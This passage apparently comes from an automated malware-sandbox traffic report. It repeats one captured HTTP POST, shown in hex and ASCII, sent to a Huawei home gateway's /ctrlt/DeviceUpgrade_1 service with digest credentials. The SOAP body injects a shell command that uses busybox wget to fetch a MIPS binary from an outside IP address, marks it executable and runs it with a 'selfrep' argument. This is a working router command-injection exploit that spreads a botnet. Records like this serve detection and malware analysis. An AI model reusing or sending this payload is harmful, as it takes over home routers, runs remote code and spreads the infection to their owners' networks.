64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
